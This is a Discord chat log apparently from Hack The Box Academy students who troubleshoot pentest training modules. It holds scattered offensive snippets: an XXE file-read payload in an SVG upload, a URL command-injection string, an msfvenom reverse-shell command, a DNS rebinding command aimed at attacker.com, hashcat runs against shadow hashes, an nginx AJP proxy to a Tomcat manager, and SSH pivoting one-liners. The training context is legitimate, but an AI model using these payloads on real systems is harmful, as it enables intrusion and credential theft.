#modules

Here lol :

I have not the samething

did you edit the configuration file

I did?

Wait.

I just replaced the port.

that's not in the instructions

you only modify the server block

I have to add this manually?
upstream tomcats {
server <TARGET_SERVER>:8009;
keepalive 10;
}

yes

Ah ok.

I thought it was already there.

you have to point it to the ajp port

you're basically using your own nginx server running tomcat with ajp, but ajp configured to reach out to the victim's "hidden" manager behind it

instead of your own

Does anyone know if the Senior PT path is something we could be ready to take after CPTS?

Like this?

revert what other changes you made, but yes

and also make sure to add the location part

just like the section shows

Ah yeah ok.

And how I restart?

idk nginx restart probably

nginx -s stop, then just start it again

Ouch :).

Fixed, thanks :).

nice

And what it does this vuln ? 🤔

i allows you to interact with the apache tomcat manager

What 👁️ ,

It’s more of web, so CBBH would be more appropriate.

Cool, I was thinking about the CBBH actually. It seems a lot of jobs I read about were leaning towards the web side of things

How to sort retired machines by user difficulty rating

Found it nvm

Yeah, web app pentester jobs are more in demand now

PASSWORD ATTACKS -----> Passwd, Shadow & Opasswd
"I'm not sure if Note.zip is helpful because I can't crack it. I also can't execute the command 'sudo cat /etc/shadow'; it says I don't have permission to view it. I don't know what to do. Can someone help me?"

For the skills assessment on Introduction to digital forensics, are we meant to just use the tools available on the target (not many) or install additional ones? As the target doesnt have internet access I wanted to check as the rest of the module teaches us about other tools

look for things in other directories that may contain hashes

question : Which kernel version is installed on the system? (Format: 1.22.3)
Output of uname -a :
Linux htb-8yvuz4jqmn 6.1.0-1parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Parrot 6.1.15-1parrot1 (2023-04-25) x86_64 GNU/Linux
None of the 6.1.0-1 answer work

can't say screen

ssh into the target

i don't have the IP

click this

i already did this

i'm in

nope you didn't ssh in

i spawned the system and then open a terminal

yes then you need to ssh into the target, pwnbox is not the target

ok

but i don't find the IP to connect*

^^^^^^^^

ok ty

Your prompt led me to use the command 'find / -name 'shadow' 2>/dev/null', and I found the important file 'shadow' in hidden files. Thank you.

Can I do identify hackthebox account with 2 discord account?

what you see is what you get. everything on the target has what you need to complete the skills assessment

hi is this intended ??

||` Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): Y
Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by
a policy defined at a more specific scope. Due to the override, your shell will retain its current effective
execution policy of Unrestricted. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more
information please see "Get-Help Set-ExecutionPolicy".
At line:1 char:1

• Set-ExecutionPolicy Bypass -Scope Process

•   + CategoryInfo          : PermissionDenied: (:) [Set-ExecutionPolicy], SecurityException
    + FullyQualifiedErrorId : ExecutionPolicyOverride,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand`||
  
  

https://academy.hackthebox.com/module/67/section/639

just transfer the stuff out

there's sqlite in your kali/parrot

Ok thanks. I'll try with what's available

anybody help for this on CDSA Introduction to DF skill assessment

Determine the registry key used for persistence and enter it as your answer.

I got the exact registry key and saw the persistent executable but it doesn't accept my answer

expand abbreviations (HKLM -> HKEY_LOCAL_MACHINE)

got it! thanks man! they should've put an answer format or something lol..answer could be anything

CBBH it is then

ayee, gl!

I am focusing more on network.

no, you can only connect one HTB account with one Discord account

Can I change it to different discord account later?

Yes, this is possible, but requires help from a mod or admin

thx it worked ( as expected ) but why does the ps command not work before ?

Due to the override, your shell will retain its current effective execution policy of Unrestricted.
looks like it's already been set

hm ok

but it did the same the first time i used it

yeah as in the machine spawned with the the SEP being unrestricted

ok understandable

thx 🙂

anybody know how i can fix rdp its incredibly slow if its does connect and most of the time it doesnt. i am trying to to the AD enumeration and attacks module again the first time round i had no issues. I am using xfreerdp because i cant get rdesktop to connect it says invalid password even though ive copied it and also tried putting it in quotes and i tried remmina aswell but that doesnt connect at all

Im doing the starting point boxes, dancer to be specific, and im attempting to enumerate the smb share, and i am having problems

wonderiing if anyone can explain ?

smbclient '\\\\10.129.113.100'```

Password for [WORKGROUP\headrx]:
do_connect: Connection to  failed (Error NT_STATUS_NOT_FOUND)```

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient -L '\\\\10.129.113.100'
do_connect: Connection to 10.129.113.100 failed (Error NT_STATUS_HOST_UNREACHABLE)```

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient -L '\\10.129.113.100'
do_connect: Connection to 10.129.113.100 failed (Error NT_STATUS_HOST_UNREACHABLE)```

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient '\\10.129.113.100'
Password for [WORKGROUP\headrx]:

\\10.129.113.100: Not enough '\' characters in service```

what gives ?

xfreerdp /v:10.129.168.153 /u:htb-student /p:Academy_student_AD!
[14:09:17:390] [5469:5470] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:09:17:390] [5469:5470] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[14:09:26:417] [5469:5470] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[14:09:26:419] [5469:5469] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

getting this error over and over can ping the machine just fine

you should use SMBMAP to find the sharedname before SMBCLIENT? the correct smbclient should be like "\\10.129.113.100\sharedName", I think....

host unreachable

you don't need smbmap to find base shares

Same issue here
3rd time I'm respawning a machine and still can't RDP to it...

potentially an issue on their end then

also wrong channel, there's a #starting-point channel; read and follow #welcome to access it

no

4th machine spawned, it didn't work (using my VM)
I've tried using the browser VM and it worked
Better than nothing 🤷‍♂️

ive tried everything even pwn box, multiple rdp software all kinds of vpns cant get it to work put it in community help but may have to message staff

which section are u on? im doing LMMNR poisoning windows

Good luck 🙏
Still, we have to use a very slow RDP connection
Can't it be fixed?

CDSA part 🙂

that's not really specific

module name will generally be more helpful

and if pwnbox works but your own connection doesn't: it's likely your own connection

SKDY is on CPTS part, I'm on CDSA part

no pwn box dont work either for me

"CPTS part"

CPTS is a path; not a "part"

Ok

im on ad module cpts lmmnr poisoning section

@devout thorn what errors do you get

i take it you've already tried contacting support?

nope not yet about tp

is it possible to connect to academy modules through my own vm? i was able to connect to the vpn provided in the module but when i ping the spawned target theres no response

soon as i message them it will probably work again

Same errors as SKDY, but PwnBox is working, so I'll use it for now
Message sent to support, I'll wait for their feeedback

yeah it sometimes just takes some time

okay, thanks

some boxes don't respond to pings

ill try pwn box again now

good to know thanks for that

make sure you turn off the vpn on your machine before using the pwnbox

yeah done it

Anyone done Skill Assessment part for advanced sqli modules?
https://academy.hackthebox.com/module/188/section/2004

sorry if this is a dumb question but where is the support chat i dont have the bubble icon for it

disable adblock

ta

oh, nvm. got it

May I ask where I can submit security vulnerabilities for the hackthbox academy

via support

this is taking awhile:/

yep this is super normal, had to hold in my anger everytime the module required rdp kek

No dont think its normal even the pwn box dont wanna connect seems like something on their end

thx

looks like the HTB infra is on its knees again...

vms are sloooooooow

nah i meant ur not the only 1 that faces this frustrating issue haha

2 people already said they having the same issues with windows machines

I thought I waas the only one with problem..

64 bytes from 10.129.102.30: icmp_seq=12 ttl=127 time=3852 ms
64 bytes from 10.129.102.30: icmp_seq=13 ttl=127 time=2853 ms
64 bytes from 10.129.102.30: icmp_seq=14 ttl=127 time=1830 ms
64 bytes from 10.129.102.30: icmp_seq=15 ttl=127 time=810 ms
64 bytes from 10.129.102.30: icmp_seq=16 ttl=127 time=2114 ms
64 bytes from 10.129.102.30: icmp_seq=17 ttl=127 time=1115 ms
64 bytes from 10.129.102.30: icmp_seq=18 ttl=127 time=94.9 ms
64 bytes from 10.129.102.30: icmp_seq=19 ttl=127 time=1391 ms
64 bytes from 10.129.102.30: icmp_seq=20 ttl=127 time=396 ms
64 bytes from 10.129.102.30: icmp_seq=21 ttl=127 time=3819 ms
64 bytes from 10.129.102.30: icmp_seq=22 ttl=127 time=2825 ms
64 bytes from 10.129.102.30: icmp_seq=23 ttl=127 time=2964 ms
64 bytes from 10.129.102.30: icmp_seq=24 ttl=127 time=1963 ms
64 bytes from 10.129.102.30: icmp_seq=25 ttl=127 time=962 ms
64 bytes from 10.129.102.30: icmp_seq=26 ttl=127 time=23.6 m
``` 😄

Message support/change vpn region

switching eu to us seems to help 🙂

slow pings yes 😉

anyone else in here has performance problems with rdp seesions ?

yes, switched to US, much better

Folks, I'm doing the Windows Privesc Module, and happened many times that after adding my user into the local admin groups, I still can't open administrator folder. Any idea why ?

C:\Users\server_adm>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.


C:\Users\server_adm>whoami
inlanefreight\server_adm

force gpupdate or relog

it takes a bit for local group changes to come into effect

Hi guys,

dumb question about the "Dynamic Port Forwarding with SSH and SOCKS Tunneling" module.
I solved it with the dynamic port forwarding and rdp.
I was wondering if its also possible with SSH Local Port Forwarding. But i coulnt make it work.

I tried the following:
||ssh -L 1234:localhost:3389 ubuntu@10.129.216.126||

Then i tried:
||xfreerdp /v:127.0.0.1 /u:victor /p:pass@123 /port:1234||

But it didnt work. Any idea why?

a question:
what is the name of the config file that has been created after 2020-03-03 and is smaller then 28k but larger then 25k.

I have typed in the console:
find / -type f -size +25k -size -28k -name *.conf -newermt 2020-03-03

all it comes up with is a load of permission denied files

I did gpupdate && gpupdate / force, didn't helped. Then I logged off with shutdown /l and relogged in, bingo. thx 🙂

This is what I use: ssh -L 3390:10.129.210.16:3389 babadmin@192.168.1.66 Then RDP 127.0.0.1:3390

1.66 is my local Kali annd 10.129 is the HTB boxc

someone help idk what I did

your syntax is wrong, you're forwarding your own localhost, you'll need to do ssh -L <localPort>:<destHost>:<destPort>

Helps to know what module and section

Linux fundamentals

And which section?

Why didnt the module use that syntax aswell? I thought i want everything i send to my local port to be sent to port 3389 on the destination host. Maybe im stupid and misunderstood the module in that part.

find files and directories

hey guys i could do with a little help with the file transfers module the question asked me to upload a file called "upload_win.zip using the method of my choice & once uploaded RDP to the box unzip and run hasher upload_win.txt

so i setup FTP on my machine RDP into target machine and download the upload_win.zip file to the desktop using the SHELL but when i got to extract the file on the target machine it tells me

"windows cannot open the folder. the compressed (zipped) folder C:/Users/htb-student/Desktop/upload_win.zip is invalid

does anybody know why this is happening?

PASSWORD ATTACKS -----> Passwd, Shadow & Opasswd
I have obtained passwd.bak and shadow.bak files, but encountered issues during password cracking. Regardless of using mutated passwords or the original ones downloaded, I couldn't crack the hashes. Here are the commands I've tried:

• hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
• hashcat -m 1800 -a 0 /tmp/unshadowed.hashes password.txt
• hashcat -m 1800 -a 0 /tmp/unshadowed.hashes password.list
• hashcat -m 1800 -a 0 /tmp/unshadowed.hashes mut_password.list

But yeah it works that way, thanks 🙂

oh wait my bad, typed wrong, you are forwarding the ubuntu host's port, but does it have rdp available?

Make sure you are redirecting stderr to /dev/null to get rid of your error messages like shown in the section where you got your current command from

Ahhh ok, that makes sense, but wasnt really clear to me in the module. Now i think i got it.

My quick 1liners if that helps

# local port forwarding
# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777
# locahost can also be remote host
ssh -L 7777:localhost:8888 user@192.168.0.100

# remote port forwarding
# you are running a service on localhost port 9999 
# and you want that service available on the target host 192.168.0.100 port 12340

ssh -R 12340:localhost:9999 user@192.168.0.100

# Local proxy through remote host
# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001

ssh -C2qTnN -D 12001 user@target.host
# The **-N** flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.

# Use SSH from a remote host, and use this remote host as SOCKS proxy
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215


# From remote host to my local machine, to forward to a machine behind remote machine
# See image below (1)
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 


# Remote dynamic port forwarding: Remote hosts connects back to us, then we use local port as SOCKs proxy to reach device behind remote hosts (2)
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 9998 kali@192.168.118.4

# use SSH via a proxy
kali@kali:~$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215

First get rid of the hash in chat, it's a spoiler. You don't need the other field past that last period.

No matter i bypassed it

Okay, I removed the hash, but I can't get the plaintext password, which is frustrating.

I'm not sure what went wrong with my operation. Could you please give me some guidance?

rdp -> citrix = pita

oh yes that I agree

that section was a pain

make sure you copy the whole line, use the mutated list to crack it, and you need to crack root's hash iirc

On Active Directory passwords module I’m at the last question input Jennifer Stapletons username:pass. So I copied NTDS.dis and system hive dumped hashes to file. Now have about 5 usernames and passes. However Jennifer stapletons password is not accepted at last question for being correct I’ve typed it and copy paste it. Case sensitive also

I Mrs I know hashcat isn’t wrong about the password any ideas so I can move forward

Mean not Mrs

are you usiing hashcat with sudo/as root, sometimes that breaks it

Ok so do without root

I’ll try that

No got the same pass for that hash

what's the module and section

Passwords module Active Directory and ntds.dit

I’ll send you the hash and pass and see if it what it it if you like

what's the first and the last character

9 0 for the hash W 8 for the pass

Im sorry 9 b

that seems right, dm me the whole thing

Ok

Check that you dont have spaces before or after password in that submit field

i can give you a hint if you need via dm

sure

it's correct, yeah make sure there's no spaces and refresh the page

Module: AD Enumeration & Attacks - Skills Assessment Part 1, Question: Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer. I have tried to retrieve all tickets using setspn.exe but I couldnt create a security token with the SPN given, and also** tools like Rubeus, Powerview could not be used**. I might need a nudge as to where to go next on this.

those tools can definitely be used, also advise to get a better shell to make things easier

im thinking of perhaps a reverse shell, with the payload transferred from my attack machine to the target

Hi guys ! I m a beginner on htb and i m stuck here with an RCE on url that works fine to navigate through the administrator and find the flag.txt but i dont know how to open it / transfer it to my attacker machine ... Does anyone knows the problem? (my rce command is ?&cd../../../../../../..&cd/Users/Administrator/Desktop&dir)

I guess you are playing boxe , so you should ask here #boxes , read #welcome and #rules

no i m on htb academy on the module called "Attacking Common Applications - Skills Assessment I"

is it "type flag.txt"?

i don 't have access to you link

type command doesnt work even with %20 or +

because you need to link your HTB account to discord

ohh well thx

did you manage to run commands ? like whoami for example ?

yeah dir command works fine but woami does not work

it's whoami

not woami

yeah i mean whoami does not work

try type+C:\Users\Administrator\Desktop\flag.txt

it does not work

shows nothing

even with curl

maybe you need to use url encoding , use decoder from burp

i ill try thx

i tried from web encoder online but maybe burp is more efficient

Hello moan can you help me please, I must to send this request to receive new password for my administrators but I don't find why?

https://academy.hackthebox.com/module/134/section/1219

I just check my note , it's a CVE

how can I have a token admin?

thank you so much i m gonna try this ! ❤️

Hey guys, I've been doing "User Enumeration via Response Timing" from the whitebox attacks module and the whole goal is to enumerate a valid user based on time. The problem is that I've been trying this for so long and I still can't find a valid user. The wordlist in the hint provided is way too large. Any hints please?

try fuzzing on the uids

https://academy.hackthebox.com/module/147/section/1391

"Password Mutations" - "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."

The list is huge with ~94k lines and the bruteforce slow. Am I doing it right?

I can see that there are some other services but they don't really seem faster.

you got the right list

Normally the academy stuff is very fast - so you are saying this one just takes a lot more time?

Nevermind I just cracked it.

Still so much slower than the other tasks, weird.

Thanks though!

this rule doesn't apply on this module , it tooks me hours to brute force this one

Yes finaly I have a solu (I find a flag but possible that encoding base64 ?

if you got the flag just copy paste , no encoding

... finally yes

^^" thanks

weird , idr doing that , congrats tho

it probably took longer than expected but I finally did it!!! thank you so much for your help !!!

echo '$text' | base64 -d

should do the same 🙂

HELP Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe my code so far is this sourcetype="WinEventLog:Sysmon" ImageLoaded="clr.dll" Image!="C:\Windows\System32" i dont know if i am on the right track any help will be appreciated

Hello there good day, I have a question.

The things taught by the academy.

Are they principle based or subject based.

That is, concerning web penetration for instance, is one going to be taught certain principles of attacking any web system, instead of the actual attack way, emphasis on principles.

Something standing the test of time as long as it has to do with web systems.

Adapting to the dynamic nature of web systems

I can elaborate on this to provide more understanding for answering my question. I believe it is clear though.

both

there are some principle stuff (the tier0 and 1 modules) then subject stuff (tier2+)

but a lot of it revolves around base principles

I am familiar with some of the Tier 0 and 1 topics

Examples include Thinking outside the box, Linux Fundamentals.

Would you say these are some of the principles ?

Learning process as well.

yes. but there's also just broad topic modules

that dive into the principle of the attack

overall the modules gear you for success

I See.

I have a change of heart towards approaching HTB academy now.

Thank you.

why did htb tell me the wrong way to create an smb share and also the wrong way to connect to an smb share in Windows Fundamentals

?

don't they go through the GUI way of creating a share in Windows?

yeah and it doesn't work

smbclient -L doesn't work and it doesn't mention anything about slashes either

I would take it personal if I were you.

you would take it personally?

Yes.

smbclient does work

i said -L doesn't work

it's usually smbclient -L \\\\ip\\

or smbclient -L //ip/

since \ is an escape character, you need to double up if you're using it for this purpose

however smbclient works with both directional slashes

yeah i figured that one out through some forums

// or \\\\

i ended up using forward slashes

it's just weird that the module doesn't mention that

¯_(ツ)_/¯

i mean reading the man page of a tool helps or it's shown in the example

never mind it was right about the way to create a share

so i have no idea what went wrong the first time i tried it

I cannot connect to the linux privilege esc lab. The lab is running, but I cannot connect to it via ssh.

I use pwnbox or vpn but nothing

which chapter is it?

Environment enumeration

Environment enumeration

is there any error that it shows?

Host work and port work but i can't connect ssh

i just tried it rn and i managed to connect via ssh

maybe restart your machine and refresh the page

I restarted the device more than 10 times. I tried to connect to pwnbox, but the same problem

I tested another module same problem

Help please > Modern Web Exploitation Techniques - Skill Assessment - Last Question. I inserted my IP into the webmin interface, ran the dnsrebinder, but it does not give me the flag. Is it a bug or something that I'm missing?

you're missing something, not a bug

I restarted the device more than 10 times. I tried to connect to pwnbox, but the same problem

what password are you using

hi guys im on Skills Assessment - File Upload Attacks

You are contracted to perform a penetration test for a company's e-commerce web application. The web application is in its early stages, so you will only be testing any file upload forms you can find.

Try to utilize what you learned in this module to understand how the upload form works and how to bypass various validations in place (if any) to gain remote code execution on the back-end server. but i cant find the uploaded file area Content-Disposition: form-data; name="uploadFile"; filename="sc.phar.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/contact/submit.php"> ]>
<svg>&xxe;</svg> but no work it works for index.php tho

if your payload works and you didn't find the info on the pages you checked, you should check other pages

i did check otherp ages

which other pages did you check

theres only two pages

main page and the upload page

so what pages are those

php

you have two pages called "php"?

that doesn't sound right, the endpoints aren't going to be named the same

you should enumerate for more pages to read

wdym

its index.php and /contact/submit.php and /contact/upload.php

you need to analyze the upload page to understand where it's being uploaded to

I even pressed the apply configuration button there ... I don't have a clue why it's not working

my guess is your rebinder command

I'm using the default one sudo python3 dnsrebinder.py --domain attacker.com --rebind 127.0.0.1 --ip 1.1.1.1 --counter 1 --tcp --udp

you can see from your rebinder screenshot it's only resovling as 127.0.0.1, hence the error on the page saying private IP detected

it is not recognizing it as 1.1.1.1, so something is off there

any hint? Because I don't have a clue x.x maybe at the webmin?

if you're sure the command is correct, the previous step required for that to work would be setting up a name server, so i would probably check to ensure that's setup correctly as well

Yep, I put my ip there at the dns client as they taught us

like i said i'd double check it all. if it's setup correctly it'll work. your screenshot shows it's not working, so that's what i would personally look into.

okok thanks! I'll double check it here

any idea ?

||[] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms16_075_reflection_juicy) >
||

https://academy.hackthebox.com/module/67/section/637

Im attempting to enumerate a box, have nmap'd, gotten a port 5000 opening, attempted to open it as a webpage at that address, but no bueno, cant find it... this is for Headless..

i can curl the page and get it, but not via a web browser..

any ideas ?

Anyone do "Attacking Common Services - Medium"? I found the nonstandard port starting with 3 but hydra isn't cracking with with the resource user/pass lists. Is there another list I should be using? Others have suggested using nmap -sC to get more information but I am not getting any additional results from that. It is an FTP service that does not allow Anonymous login

I thought it was a different port?

There is another FTP service available. From some of the forums it seemed like the port starting 3 was the initial foothold

ohh im sorry i thought you were on another section

hey guys

excuse me, may someone answer me please

anyone knows any service similar to HTB that teaches AI rather than cyber security?

You can probably google AI/ML courses

right :) thank you!

I was just thinking about that it might be fun website like HTB and so on

Guys I am stuck at Protected Files module in Password attacks , The question is asking for Kira's password which I believe I got in previous modules but the problem is I had a long break and I am continuing the modules , Can anyone guide me in which module I can find Kira's Password?

https://www.datacamp.com/
https://brilliant.org/
https://www.codeavail.com/blog/ai-projects-for-students/

or if you like udemy you can get this course it seems pretty popular and highly reviewed...
https://www.udemy.com/course/machine-learning-and-ai-with-hands-on-projects/

fair warning you can get udemy for free from your local library if they've partnered up with them

You used her password in the credential hunting linux portion (see the hint)

You get kira's password in the credential hunting in linux section

hi folks, I am on the pivoting module and have a conceptual question / doubt

when doing remote / reverse port forwarding... do I still need socks? no , right?

like... let's say my pivot is Linux and my target in the internal network is Windows. I want to capture a reverse shell on my Kali machine.

No need to edit proxychains.conf, correct?

Some don't use socks as their proxy

what do you mean with "some"

But it just depends on the tool

I mean exactly that, proxychains uses a socks proxy to serve traffic

well, if I setup nc on Kali and I just want to "grab" the reverse shell

do I need socks? yes or not

You'd need some link between the devices

'cause I do not see that mentioned on that lesson

You'd need some pivot/proxy to forward traffic to your system

right, that's ssh with -R no?

Sort of

again, I do not see any step on that lesson messing around with .conf

so it is a correct assumption, we don't need it during a remote / reverse port fwd scenario?

With -R you are creating a reverse proxy, but if you're trying to catch a shell from the third machine, you need to have it call back to the second and then the second forwards it to you

I understand all that

Again: it depends in the tool used

what tool are you referring? we are using ssh

Most tools that refer to using proxychains will require socks

and xfreerdp

ssh that is being run on Kali with -R ... xfreerdp.....what tool are you referring to? there is no tool in that scenario

sigh if the example commands don't use proxychains, you don't use proxychains

Xfreerdp is a tool, ssh is a tool

https://academy.hackthebox.com/module/158/section/1427

This lesson

so the answer is no?

I assume

on this particular scenario, using ssh and xfreerdp...

What this is showing, if you're actually paying attention, is that the -R in this case is the bridge

this leads to my next question... is there any list of tools that require socks?

Just take notes of the ones from this module that do

There's no grand list that has all this info

ok

If it does, it does, if it doesn't-- it doesn't

ok

It's just that simple

I was just trying to recreate that but I couldn't

it seems there is a missing step

I need to use socks to rdp and run the .EXE

that's not shown

No you don't

then how do I suppose to execute backupscript.exe?

If I am not logged in windows?

I need to run it, to invoke the reverse shell

I believe you might be able to log into the second host with ssh from the Ubuntu host

ubuntu to windows via ssh?

that's assuming windows uses ssh

Otherwise, gain rdp access with another method

Which it could be, did you rule it out?

no, but very uncommon

the two exercises do not ask that, but I was curious and tried to mimic the whole scenario

ssh into ubuntu pivot to windows, proxy into rdp to windows 😭

that's what I am saying but then I need socks

Yes, which isn't illegal to use

proxychains xfreerdp blah blah

then use socks?

Like. This whole scenario is built around you already having some form of access to the internal network

what are u trying to do? not use socks?

ok, I did something wrong, maybe the payload.... I use a regular msfvenom payload not http one for meterpreter

get a reverse shell

sigh

relax, just trying to learn

You're trying to overcomplicate it

This section and the previous one go hand in hand

did not want to use multihandler

Also you can open multiple ssh sessions to a target at the same time btw

u would need to make the traffic from the pivot host (ubuntu) transfer to your local hosts from windows

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 LPORT=8080 -f exe > backupscript.exe

I used that

which I did, with -R and ssh

Use the exact syntax of the one given by the module

wouldnt lhost be your local box? im not on my laptop

again, I am trying to tweak it

deviate from its original purpose

avoiding multihandler

Don't tweak things until you've got it working first

No

I have no issue with the other way

In this module the lhost is the jumphost

I just want to understand why it did not work

ohh got it

I know that

I'd honestly stop bothering with trying, as there's other (better) tools

ok

well, to be honest, ligolo makes this piece of cake

Also fwiw idt windows/reverse_shell_tcp is even a payload

but I just wanted to recreate the whole exercise, without multihandler

I guess the exercise was designed to work "as is"

You can definitely tweak it for you, if you set the payload right

ok

Also I was right

I will play around with it tomorrow

It's not windows/shell_reverse_tcp

It's windows/shell/reverse_tcp

Which is likely why your payload doesn't work

Good point... I will give it a try

Thanks for the extra patience , lol

All I did was google msfvenom payloads

I do not like to move on and "accept" stuff just because

Sometimes it saves the mental strain of finding out you're just being dumb

Yeah, I have a full list on my notes, is late and I am tired, missed that being staged

excuse me?

asking questions is not being dumb

sorry to pivot the current subject. i am on password attacks lab - medium. I obtained a zip folder which had encrypted .docx file inside Iwas able to convert the has and get the password for the .docx. only issue is i have no way of reading the file in the first place. I tried using docx2txt and libreoffice. for some reason Libre causes an error stating javaldx may not work properly and just shuts down.

that was rude

It's not a personal dig, its literally saving the feeling of being dumb for not realizing you made a simple syntax error

Which I've done multiple times myself

Try with openoffice

Sorry that you took it as rude. Didn't mean it that way. Maybe you should get some rest if something that small bugged you.

I am certainly calling off the night, but that is not something "small"

I do not call people dumb

have a good one

I didn't call you dumb, just the situation of being dumb with syntax errors dude

Happens to literally everyone

he just still new to know that it happens to everyone about syntax xd

htbdbstudent or whatever still haunts me

sudo allows you to not perform the 3way handshake...which is faster but requires admin privs.

when enumerating, it is always recommended to use -sV ... and also, -sC ... so you can get as much info as you can from a given service, assuming the ports are open

People have their own preference when using nmap.... I personally prefer to check for open ports (with nothing else) then I use -sV on those open ports. Hope that helps.

for the HTB Academy Module: Active Directory LDAP -Skills assessment, has anyone ran into the issue of {'desc': "Can't contact LDAP server", 'errno': 107, 'info': 'Transport endpoint is not connected'}

sudo gives you access to the raw sockets

I think it could be an issue with certificates, but I'm not entirely sure

any chance of having a regex added for when i verify the flag? i keep leaving spaces in then thinking i've got the wrong flag

I don't recall any issues with that module

so I obtained the password for id_rsa. How do i know what user it belongs to? i already soled the module which it belongs to root, but that was after someone spoiled the answer for me.

if i was on a real engagement am i just blindly testing id_rsa with "root" as the user

when i ssh

what happens if i found numerous users and don't know what user the key belongs to?

FYI the key was encrypted, so i dont see anything in plain txt

by itself the key doesn't contain any info about the owner or the accounts it can access. only indrect ways like checking the accompanying public key or authorized_keys file, looking for clues in the filename or path, checking ssh agent or ssh config files, sometimes there may be key metadata

or just bruteforce it if you have a list of users

fuck around and find out- best tip ever

definitely doing so.

u use htb academy?

haven't really looked much around htb, just saw a couple challenges and want to learn pen testing

what's in academy?

if i could start over again, i will complete the modules getting started and learning process to get my mental stable

ur getting nowhere if u dont have clear mentality

and for nmap, thats like the bare start for many people and i guarantee u wont understand 99% of the info it gives you until you progress further

like vulnerability discovery, weak points, insecure services etc

so its alr to get fucked at first

i'm not so worried , obviously on the very easy challenges and i have plenty resources to look at but i know i will get to where i want to be in a couple months time

u will get worried when you screw up i advice you to do the learning process on htb academy

the module is just yapping about random stuff but its very nice

Wrong channel, #starting-point is for starting point machines (read and follow #welcome to access it)

ty

You can rename the files

genuinely...who cares

like ik its not the right channel

People that want to keep this channel on topic

never heard them

dont get triggered by single question in wrong channel

and it's genuinely the better place to search for help with starting-point machines ¯_(ツ)_/¯

fuck around and find out lol

As common questions people have had have been asked and answered

The fuck does that mean in this context? Lol

fuck around and find out?

never done it before?

I have, just no idea what it means in relation to the statement you replied to

that mfs will take their time, find different channels, explore new shit, and no need to get triggered by one question asked in the wrong channel

I'm not being triggered?

I'm stating a fact: wrong channel, and it's fairly common that people just click through and not even know there's more to the server

Some people know and just refuse to link their account

¯_(ツ)_/¯

But keeping this channel on topic for modules allows others that need help not get drowned out by unrelated nonsense

Like this argument?

thats fire argument ngl🔥 but i personally prefer to answer people at place instead of refering them to the channel they are 'supposed' to ask in

whatever boats your float dude ¯_(ツ)_/¯

then you're doing it wrong, right channel for the right things

whats that supposed to mwan

I wasn't calling anyone out for helping them

wrong channel for right things?

ik

Just informing that there's an apt channel for it

Sorry for trying to be more helpful to them. It also prevents future times of asking in the wrong channel and then being redirected again

If I was "triggered" over it, I wouldn't have pointed them in any direction

never confronted you for being "more helpful"

but alr

.

This reads as confrontational

it isnt

¯_(ツ)_/¯

Later dude, have the day you deserve

乁⁠|⁠ ⁠･⁠ ⁠〰⁠ ⁠･⁠ ⁠|⁠ㄏ

which day do i deserve?

Whatever the day may bring

my day brings exams, a lot, anyway, byebye

Okay. Enough.

Seeking help for WINDOWS ATTACKS & DEFENSE : Kerberos Constrained Delegation
Question: Use the techniques shown in this section to gain access to the DC1 domain controller and submit the contents of the flag.txt file.
My issue: I've RDPed into the target system and ran the powerview.ps1 script. By right I should have Get-NetUser cmdlet available at this stage. However when trying to run it, powershell keeps telling me the command is not found

you need to import powerview instead of just running it

ah Thanks. missed that out in my notes

@fathom pendant It's smart to direct people to the appropriate sections because people mute/hide sections they don't care about. It's nice that you're active and helping others. It takes 10 seconds to cut/paste a question to the appropriate section. Thanks for being a good community member and doing your best to communicate well.

Hello

Any professional hacker here?

no

I wanna ask something

So I'm on Password Attacks Lab - Hard. They provided the J***** user, but running the mut_pass.list created with provided resources through crackmapexec smb is so unfeasable. Am i missing something here because at the rate it is brute forcing the smb its going to take 18 hours plus.

I want to learn hacking but I don't have laptop

